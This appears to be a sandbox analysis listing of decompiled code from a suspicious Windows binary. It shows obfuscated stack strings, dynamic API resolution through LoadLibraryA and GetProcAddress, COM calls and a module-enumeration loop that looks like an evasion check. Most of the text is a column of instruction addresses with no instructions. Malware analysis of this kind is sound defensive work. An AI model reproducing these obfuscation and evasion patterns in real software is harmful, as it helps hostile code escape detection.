 *((char*)(_t561 + 0x3d)) = 0x29;
 *((char*)(_t561 + 0x3e)) = 0x57;
 *((char*)(_t561 + 0x3f)) = 0x56;
 *((char*)(_t561 + 0x40)) = 0xf8;
 *((char*)(_t561 + 0x41)) = 0x98;
 *((char*)(_t561 + 0x42)) = 0x5b;
 *((char*)(_t561 + 0x43)) = 0xf4;
 *((char*)(_t561 + 0x44)) = 0xb5;
 *((char*)(_t561 + 0x45)) = 0x87;
 *((char*)(_t561 + 0x46)) = 0x7b;
 *((char*)(_t561 + 0x47)) = 0xf;
 *((char*)(_t561 + 0x48)) = 0xf4;
 *((char*)(_t561 + 0x49)) = 0x76;
 *((char*)(_t561 + 0x4a)) = 0xb9;
 *((char*)(_t561 + 0x4b)) = 0x34;
 *((char*)(_t561 + 0x4c)) = 0xbf;
 *((char*)(_t561 + 0x4d)) = 0x1e;
 *((char*)(_t561 + 0x4e)) = 0xe7;
 *((char*)(_t561 + 0x4f)) = 0x78;
 *((char*)(_t561 + 0x50)) = 0x98;
 *((char*)(_t561 + 0x51)) = 0xe9;
 *((char*)(_t561 + 0x52)) = 0x6f;
 *((char*)(_t561 + 0x53)) = 0xb4;
 *((char*)(_t561 + 0x54)) = 0;
_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
_t562 = _t561 + 0x24;
_t365 = LoadLibraryA(_t364); // executed
_t538 = _t365;
 *((char*)(_t562 + 0x10)) = 0xe0;
 *((char*)(_t562 + 0x11)) = 0x18;
 *((char*)(_t562 + 0x12)) = 0xad;
 *((char*)(_t562 + 0x13)) = 0x36;
 *((char*)(_t562 + 0x14)) = 0x95;
 *((char*)(_t562 + 0x15)) = 0x21;
_t451 = _t562 + 0x134;
 *((char*)(_t562 + 0x1e)) = 0x2a;
 *((char*)(_t562 + 0x1f)) = 0x57;
 *((char*)(_t562 + 0x20)) = 0xda;
 *((char*)(_t562 + 0x21)) = 0xc;
 *((char*)(_t562 + 0x22)) = 0x55;
 *((char*)(_t562 + 0x23)) = 0x25;
 *((char*)(_t562 + 0x24)) = 0x8c;
 *((char*)(_t562 + 0x25)) = 0xf9;
 *((char*)(_t562 + 0x26)) = 0x35;
 *((char*)(_t562 + 0x27)) = 0x97;
 *((char*)(_t562 + 0x28)) = 0xd0;
 *((char*)(_t562 + 0x29)) = 0x87;
 *((char*)(_t562 + 0x2a)) = 0x7b;
 *((char*)(_t562 + 0x2b)) = 0xf;
 *((char*)(_t562 + 0x2c)) = 0xf4;
 *((char*)(_t562 + 0x2d)) = 0x76;
 *((char*)(_t562 + 0x2e)) = 0xb9;
 *((char*)(_t562 + 0x2f)) = 0x34;
 *((char*)(_t562 + 0x30)) = 0xbf;
 *((char*)(_t562 + 0x31)) = 0x1e;
 *((char*)(_t562 + 0x32)) = 0xe7;
 *((char*)(_t562 + 0x33)) = 0x78;
 *((char*)(_t562 + 0x34)) = 0x98;
 *((char*)(_t562 + 0x35)) = 0xe9;
 *((char*)(_t562 + 0x36)) = 0x6f;
 *((char*)(_t562 + 0x37)) = 0xb4;
 *((char*)(_t562 + 0x38)) = 0;
_t366 = E00401650(_t562 + 0x14, _t451);
_t563 = _t562 + 8;
_t367 = GetProcAddress(_t365, _t366);
__eflags = _t367;
_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
__eflags = _t452;
 *(_t563 + 0x47) = _t452 == 0;
 *0x423480 = _t367;
 *((intOrPtr*)(_t563 + 0x80)) = 0;
 *((intOrPtr*)(_t563 + 0x84)) = 0;
 *((intOrPtr*)(_t563 + 0x4c)) = 0;
 *(_t563 + 0x58) = 0;
 *(_t563 + 0x54) = 0;
                                                                                                                                                                                          						__eflags = _t452;
                                                                                                                                                                                          						if(_t452 != 0) {
                                                                                                                                                                                          							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                          							__eflags = _t368;
                                                                                                                                                                                          							if(_t368 >= 0) {
                                                                                                                                                                                          								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                          								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                          									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                          									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                          									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                          									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                          									__eflags = _t378;
                                                                                                                                                                                          									if(_t378 >= 0) {
                                                                                                                                                                                          										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                          										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                          										__eflags = _t383;
                                                                                                                                                                                          										if(_t383 >= 0) {
                                                                                                                                                                                          											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                          											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                          											__eflags = _t385;
                                                                                                                                                                                          											if(_t385 >= 0) {
                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                          												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                          												_t539 = __imp__#8;
                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                          												 *_t539(_t563 + 0x94);
                                                                                                                                                                                          												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                          												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                          												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                          												__eflags = _t542;
                                                                                                                                                                                          												if(_t542 == 0) {
                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                          												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                          												_t543 = _t396;
                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                          												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                          												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                          												_t564 = _t563 + 0xc;
                                                                                                                                                                                          												__imp__#24(_t543);
                                                                                                                                                                                          												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                          												__eflags = _t399;
                                                                                                                                                                                          												if(_t399 == 0) {
                                                                                                                                                                                          													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                          												__eflags = _t543;
                                                                                                                                                                                          												if(_t543 != 0) {
                                                                                                                                                                                          													__imp__#16(_t543); // executed
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                          												__eflags = _t402;
                                                                                                                                                                                          												if(_t402 == 0) {
                                                                                                                                                                                          													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                          												_t555 = _t402;
                                                                                                                                                                                          												__eflags = _t469;
                                                                                                                                                                                          												if(_t469 == 0) {
                                                                                                                                                                                          													_t531 = 0;
                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													_t531 =  *_t469;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                          												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                          												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                          												__eflags = _t471;
                                                                                                                                                                                          												if(_t471 == 0) {
                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                          												__eflags = _t405;
                                                                                                                                                                                          												if(_t405 == 0) {
                                                                                                                                                                                          													_t514 = 0;
                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													_t514 =  *_t405;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t563 = _t564 - 0x10;
                                                                                                                                                                                          												_t407 = _t563;
                                                                                                                                                                                          												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                          												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                          												_t538 = __imp__#9; // 0x75c6cf00
                                                                                                                                                                                          												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                          												E004019A0(_t563 + 0x38);
                                                                                                                                                                                          												_t538->i(_t563 + 0x94);
                                                                                                                                                                                          												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                          												__eflags = _t413;
                                                                                                                                                                                          												if(_t413 != 0) {
                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												E004019A0(_t563 + 0x40);
                                                                                                                                                                                          												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                          												__eflags = _t415;
                                                                                                                                                                                          												if(_t415 != 0) {
                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                          												}
                                                                                                                                                                                          											}
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                          									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                          										_push(_t379);
                                                                                                                                                                                          										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                          										_t563 = _t563 + 4;
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                          							__eflags = _t369;
                                                                                                                                                                                          							if(_t369 != 0) {
                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                          							__eflags = _t370;
                                                                                                                                                                                          							if(_t370 != 0) {
                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          						goto L80;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                          						_t565 = _t557 + 8;
                                                                                                                                                                                          						_t547 = _t428;
                                                                                                                                                                                          						_t520 = _t565 + 0x298;
                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                          							_t429 =  *_t520;
                                                                                                                                                                                          							if(_t429 !=  *_t547) {
                                                                                                                                                                                          								break;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if(_t429 == 0) {
                                                                                                                                                                                          								L7:
                                                                                                                                                                                          								_t429 = 0;
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                          								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                          									break;
                                                                                                                                                                                          								} else {
                                                                                                                                                                                          									_t520 = _t520 + 2;
                                                                                                                                                                                          									_t547 = _t547 + 2;
                                                                                                                                                                                          									if(_t493 != 0) {
                                                                                                                                                                                          										continue;
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										goto L7;
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          							L9:
                                                                                                                                                                                          							if(_t429 != 0) {
                                                                                                                                                                                          								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                          								_t557 = _t565 + 8;
                                                                                                                                                                                          								_t548 = _t431;
                                                                                                                                                                                          								_t488 = _t557 + 0x298;
                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                          									_t432 =  *_t488;
                                                                                                                                                                                          									__eflags = _t432 -  *_t548;
                                                                                                                                                                                          									if(_t432 !=  *_t548) {
                                                                                                                                                                                          										break;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                          										L16:
                                                                                                                                                                                          										_t432 = 0;
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                          										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                          										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                          											break;
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											_t488 = _t488 + 2;
                                                                                                                                                                                          											_t548 = _t548 + 2;
                                                                                                                                                                                          											__eflags = _t432;
                                                                                                                                                                                          											if(_t432 != 0) {
                                                                                                                                                                                          												continue;
                                                                                                                                                                                          											} else {
                                                                                                                                                                                          												goto L16;
                                                                                                                                                                                          											}
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          									L18:
                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                          										goto L10;
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                          										__eflags = _t435;
                                                                                                                                                                                          										if(_t435 != 0) {
                                                                                                                                                                                          											do {
                                                                                                                                                                                          												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                          												_t566 = _t557 + 8;
                                                                                                                                                                                          												_t549 = _t437;
                                                                                                                                                                                          												_t490 = _t566 + 0x298;
                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                          													_t438 =  *_t490;
                                                                                                                                                                                          													__eflags = _t438 -  *_t549;
                                                                                                                                                                                          													if(_t438 !=  *_t549) {
                                                                                                                                                                                          														break;
                                                                                                                                                                                          													}
                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                          														L26:
                                                                                                                                                                                          														_t438 = 0;
                                                                                                                                                                                          													} else {
                                                                                                                                                                                          														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                          														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                          														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                          															break;
                                                                                                                                                                                          														} else {
                                                                                                                                                                                          															_t490 = _t490 + 2;
                                                                                                                                                                                          															_t549 = _t549 + 2;
                                                                                                                                                                                          															__eflags = _t438;
                                                                                                                                                                                          															if(_t438 != 0) {
                                                                                                                                                                                          																continue;
                                                                                                                                                                                          															} else {
                                                                                                                                                                                          																goto L26;
                                                                                                                                                                                          															}
                                                                                                                                                                                          														}
                                                                                                                                                                                          													}
                                                                                                                                                                                          													L28:
                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                          														goto L10;
                                                                                                                                                                                          													} else {
                                                                                                                                                                                          														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                          														_t557 = _t566 + 8;
                                                                                                                                                                                          														_t550 = _t439;
                                                                                                                                                                                          														_t492 = _t557 + 0x298;
                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                          															_t440 =  *_t492;
                                                                                                                                                                                          															__eflags = _t440 -  *_t550;
                                                                                                                                                                                          															if(_t440 !=  *_t550) {
                                                                                                                                                                                          																break;
                                                                                                                                                                                          															}
                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                          																L34:
                                                                                                                                                                                          																_t440 = 0;
                                                                                                                                                                                          															} else {
                                                                                                                                                                                          																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                          																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                          																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                          																	break;
                                                                                                                                                                                          																} else {
                                                                                                                                                                                          																	_t492 = _t492 + 2;
                                                                                                                                                                                          																	_t550 = _t550 + 2;
                                                                                                                                                                                          																	__eflags = _t440;
                                                                                                                                                                                          																	if(_t440 != 0) {
                                                                                                                                                                                          																		continue;
                                                                                                                                                                                          																	} else {
                                                                                                                                                                                          																		goto L34;
                                                                                                                                                                                          																	}
                                                                                                                                                                                          																}
                                                                                                                                                                                          															}
                                                                                                                                                                                          															L36:
                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                          																goto L10;
                                                                                                                                                                                          															} else {
                                                                                                                                                                                          																goto L37;
                                                                                                                                                                                          															}
                                                                                                                                                                                          															goto L81;
                                                                                                                                                                                          														}
                                                                                                                                                                                          														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}
                                                                                                                                                                                          0x00401e7d
                                                                                                                                                                                          0x00401e82
                                                                                                                                                                                          0x00401e86
                                                                                                                                                                                          0x00401e8b
                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                          0x00401e9a
                                                                                                                                                                                          0x00401ea4
                                                                                                                                                                                          0x00401eaf
                                                                                                                                                                                          0x00401eba
                                                                                                                                                                                          0x00401ebf
                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                          0x00401ec6
                                                                                                                                                                                          0x00401ecb
                                                                                                                                                                                          0x00401ece
                                                                                                                                                                                          0x00401ed2
                                                                                                                                                                                          0x00401ed4
                                                                                                                                                                                          0x00401eef
                                                                                                                                                                                          0x00401ed6
                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                          0x00401ee2
                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                          0x00401ef7
                                                                                                                                                                                          0x00401efc
                                                                                                                                                                                          0x00401f02
                                                                                                                                                                                          0x00401f08
                                                                                                                                                                                          0x00401f0c
                                                                                                                                                                                          0x00401f15
                                                                                                                                                                                          0x00401f18
                                                                                                                                                                                          0x00401f1a
                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                          0x00401f2f
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f40
                                                                                                                                                                                          0x00401f45
                                                                                                                                                                                          0x00401f4a
                                                                                                                                                                                          0x00401f4b
                                                                                                                                                                                          0x00401f50
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                          0x00401f69
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f73
                                                                                                                                                                                          0x00401f75
                                                                                                                                                                                          0x00401f7b
                                                                                                                                                                                          0x00401f80
                                                                                                                                                                                          0x00401f81
                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                          0x00401f8c
                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                          0x00401f9d
                                                                                                                                                                                          0x00401fa2
                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                          0x00401fac
                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                          0x00401fb6
                                                                                                                                                                                          0x00401fbf
                                                                                                                                                                                          0x00401fc4
                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                          0x00401fce
                                                                                                                                                                                          0x00401fd3
                                                                                                                                                                                          0x00401fe0
                                                                                                                                                                                          0x00401fec
                                                                                                                                                                                          0x00401ffe
                                                                                                                                                                                          0x00402001
                                                                                                                                                                                          0x00402006
                                                                                                                                                                                          0x0040200b
                                                                                                                                                                                          0x00402010
                                                                                                                                                                                          0x00402015
                                                                                                                                                                                          0x0040201a
                                                                                                                                                                                          0x0040201f
                                                                                                                                                                                          0x00402024
                                                                                                                                                                                          0x00402029
                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                          0x00402033
                                                                                                                                                                                          0x00402038
                                                                                                                                                                                          0x0040203d
                                                                                                                                                                                          0x00402042
                                                                                                                                                                                          0x00402047
                                                                                                                                                                                          0x0040204c
                                                                                                                                                                                          0x00402051
                                                                                                                                                                                          0x00402056
                                                                                                                                                                                          0x0040205b
                                                                                                                                                                                          0x00402060
                                                                                                                                                                                          0x00402065
                                                                                                                                                                                          0x0040206a
                                                                                                                                                                                          0x0040206f
                                                                                                                                                                                          0x00402074
                                                                                                                                                                                          0x00402079
                                                                                                                                                                                          0x0040207e
                                                                                                                                                                                          0x00402083
                                                                                                                                                                                          0x00402088
                                                                                                                                                                                          0x0040208d
                                                                                                                                                                                          0x00402092
                                                                                                                                                                                          0x00402097
                                                                                                                                                                                          0x0040209c
                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                          0x004020a5
                                                                                                                                                                                          0x004020aa
                                                                                                                                                                                          0x004020ae
                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                          0x004020b6
                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                          0x004020c0
                                                                                                                                                                                          0x004020c5
                                                                                                                                                                                          0x004020ca
                                                                                                                                                                                          0x004020cf
                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                          0x004020e1
                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                          0x004020eb
                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                          0x004020f5
                                                                                                                                                                                          0x004020fa
                                                                                                                                                                                          0x004020ff
                                                                                                                                                                                          0x00402104
                                                                                                                                                                                          0x00402109
                                                                                                                                                                                          0x0040210e
                                                                                                                                                                                          0x00402113
                                                                                                                                                                                          0x00402118
                                                                                                                                                                                          0x0040211d
                                                                                                                                                                                          0x00402122
                                                                                                                                                                                          0x00402127
                                                                                                                                                                                          0x0040212c
                                                                                                                                                                                          0x00402131
                                                                                                                                                                                          0x00402136
[Disassembly listing residue: only the instruction-address column survived extraction (addresses 0x00401c55 through 0x00402488, plus 0x00000000 placeholder rows); the corresponding instructions, operands and control-flow annotations are not present on the page.]
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401cd2
                                                                                                                                                                                          0x00401cd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                          0x00401cd8
                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                          0x00401ce5
                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cf9
                                                                                                                                                                                          0x00401d02
                                                                                                                                                                                          0x00401d07
                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                          0x00401d1d
                                                                                                                                                                                          0x00401d22
                                                                                                                                                                                          0x00401d25
                                                                                                                                                                                          0x00401d27
                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                          0x00401d32
                                                                                                                                                                                          0x00401d34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d36
                                                                                                                                                                                          0x00401d38
                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                          0x00401d3d
                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                          0x00401d45
                                                                                                                                                                                          0x00401d48
                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d5d
                                                                                                                                                                                          0x00401d6a
                                                                                                                                                                                          0x00401d6f
                                                                                                                                                                                          0x00401d72
                                                                                                                                                                                          0x00401d74
                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                          0x00401d82
                                                                                                                                                                                          0x00401d84
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d86
                                                                                                                                                                                          0x00401d88
                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                          0x00401d8d
                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                          0x00401d95
                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                          0x00401da0
                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                          0x00401d50
                                                                                                                                                                                          0x00401d52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401dad
                                                                                                                                                                                          0x00401db6
                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                          0x00401cf0
                                                                                                                                                                                          0x00401cf2
